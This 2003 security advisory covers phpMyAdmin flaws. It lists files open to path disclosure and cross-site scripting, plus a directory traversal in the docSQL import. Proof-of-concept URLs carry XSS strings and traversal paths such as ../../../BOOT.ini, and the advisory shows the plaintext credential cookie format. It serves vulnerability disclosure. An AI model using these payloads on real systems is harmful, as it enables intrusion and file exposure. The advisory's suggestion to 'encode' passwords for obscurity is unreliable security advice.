('binary' encoding is not supported, stored as-is) phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures -------------------- Product: phpMyAdmin Vendor: phpMyAdmin Development Team Versions: VULNERABLE - 2.5.2 CVS ( in Development ) - 2.5.x - 2.4.x - 2.3.x - 2.2.x - 2.1.x - 2.0.x - 1.x.x NOT VULNERABLE - ? Advisory: NSRG-15-7 --------------------- Description: phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. ----------------------------------------- SECURITY HOLES FOUND and PROOFS OF CONCEPT: ----------------------------------------- I encountered Cross Site Scripting Vulnerabilities and Path Disclosures in some files of the phpMyAdmin installation , with this files , sending a specially crafted url you can execute commands in the client side only and show the local path of the phpMyAdmin installation. The failures are related to a input validation flaw and a inproper configuration of php.ini and php configuration declare library ( declare_php.lib.php )in phpMyAdmin for the errors flags. I encountered a very dangerous transversal directory attack in a docSQL import system too. I discover that phpMyAdmin don't encode the mysql user and password , it save the data in plain text without encoding !. ------------------------------- | XSS AND PATH DISCLOSURES | ------------------------------- The affected files of the XSS attack ( Cross Site Scripting ) and Path Disclosure are: - sql.php / sql.php3 - Path Disclosure & XSS- - pdf_schema.php - Path Disclosure & XSS- - pdf_pages.php - Path Disclosure & XSS- - ldi_table.php - Path Disclosure & XSS- - mult_submits.inc.php - Path Disclosure & XSS- - chk_rel.php - Path Disclosure - - db_create.php - Path Disclosure - - db_datadict.php - Path Disclosure & XSS- - db_details.php - Path Disclosure - - db_details_common.php- Path Disclosure - - db_details_db_info.php - Path Disclosure - - db_details_export.php - Path Disclosure - - db_details_structure.php - Path Disclosure - - db_printview.php - Path Disclosure & XSS- - db_search.php - Path Disclosure - - header_printview.inc.php - Path Disclosure - - ldi_check.php - Path Disclosure - - read_dump.php - Path Disclosure & XSS- - tbl_addfield.php - Path Disclosure - - tbl_alter.php - Path Disclosure - - tbl_create.php - Path Disclosure - - tbl_dump.php - Path Disclosure - - tbl_move_copy.php - Path Disclosure - - tbl_printview.php - Path Disclosure - - tbl_properties.inc.php - Path Disclosure - - tbl_properties.php -Path Disclosure - - tbl_properties_common.php -Path Disclosure - - tbl_properties_export.php -Path Disclosure - - tbl_properties_links.php -Path Disclosure - - tbl_properties_operations.php -Path Disclosure - - tbl_properties_options.php -Path Disclosure - - tbl_properties_table_info.php -Path Disclosure - - tbl_query_box.php -Path Disclosure - - tbl_relation.php -Path Disclosure - - tbl_rename.php -Path Disclosure - - tbl_replace.php -Path Disclosure - - tbl_select.php -Path Disclosure - NOTE: The Path Disclosures occur when you access directly the affected file without any QUERY_STRING needing a valid session. The XSS can executed passing crafted query_strings to the php scripts , see Samples for more info about this. VULNERABLE FILES TO PATH DISCLOSURES And XSS THAT DOESN'T NEED A VALID SESSION : - libraries/auth/[cookie.auth.lib.php] - Path Disclosure - - libraries/xpath/[XPath.class.php] - Path Disclosure - - libraries/[ip_allow_deny.lib.php] - Path Disclosure - - libraries/[select_lang.lib.php] - Path Disclosure - - libraries/sqlparser.lib.php - Path Disclosure - - libraries/db_table_exists.lib.php - Path Disclosure - ----------------------------------- | DIRECTORY TRANSVERSAL ATTACK & | | REMOTE LOCAL FILE RETRIEVING & | | REMOTE INTERNAL DIRECTORY LISTING ----------------------------------- I found a dangerous transversal directory attack in the file called db_details_importdocsql.php ( file import systems ) , i explain this failure in the Proof of Concept: ____Proof of Concept______ You must send a crafted request to the db_details_importdocsql.php file : http://localhost/mysql/db_details_importdocsql.php? submit_show=true&do=import&docpath=[YOUR TRANSVERSAL DIRECTORY ATTACK] If you want to do a internal directory listing you must do this request: http://localhost/mysql/db_details_importdocsql.php? submit_show=true&do=import&docpath=../../../ With this request you can list the internal directories in the root dir in a win installation ( normally c:\ ). Note that you can't request files ( only dirs ) with db_details_importdocsql.php if you attempt to get a file you get this message: This was not a Directory . SAMPLE RESULT OF A CGI-BIN DIRECTORY LISTED WITH THIS ATTACK: Server iamnottotallysecured.not Ignoring the file . Ignoring the file .. Ignoring the file phf.cgi // ;-) Ignoring the file dumpenv.pl Ignoring the file test-cgi // ;-) Ignoring the file testcgi.pl // ;-D Ignoring the file wwwboard.pl Ignoring the file count.cgi Ignoring the file php.cgi // ;-D Ignoring the file passwd.pl Ignoring the file admin.cgi Ignoring the file ftp.cgi Ignoring the file formmail.pl // ;-D Ignoring the file proxy.pl _______ Samples: """"""" Note that this paths are from my personal server in my testing lab: The target user or you must be logged in for run the attacks : http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1> http://localhost/mysql/db_datadict.php?db=XSS http://localhost/mysql/db_details_importdocsql.php? submit_show=true&do=import&docpath=../../../BOOT.ini http://localhost/mysql/read_dump.php? db=nonexistent&sql_query="><h1>XSS</h1> http://localhost/mysql/tbl_properties_links.php? table_info_num_rows=10&url_query="><h1>XSS ------------------ | INFORMATION | | ENCODING | | WEAKNESS | ------------------ phpMyAdmin doesn't use any encoding type like BASE64/RadiX64 , only saves the user data ( username and password too ) in plain text without any encoding. The authentication token in the cookie is this: pma_cookie_username=[UserName]; lang=[language]-iso-8859-1; pma_cookie_password=[your password] A sample is: pma_cookie_username=god; lang=en-iso-8859-1; pma_cookie_password=doesnotexist ----------------- | SOLUTIONS ;-p | ----------------- - First: Redefine the errors flags in php.ini to Off. [Path Disclosures] - Second: Use a partial / secure encoding for athentication tokens like RadiX64 ( not very secure but an attacker can think that is a more secure algorithm , obscurity ;-D ) . - Three: Review the db_details_importdocsql.php file for prevent transversal directory attacks and remote local directory listing. ----------- | CONTACT | ----------- Lorenzo Hernandez Garcia-Hierro --- Computer Security Analyzer --- --Nova Projects Professional Coding-- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** NSRGroup : http://security.novappc.com are you totally secured ? ______________________
This archive was generated by hypermail 2b30 : Wed Jun 18 2003 - 12:04:31 PDT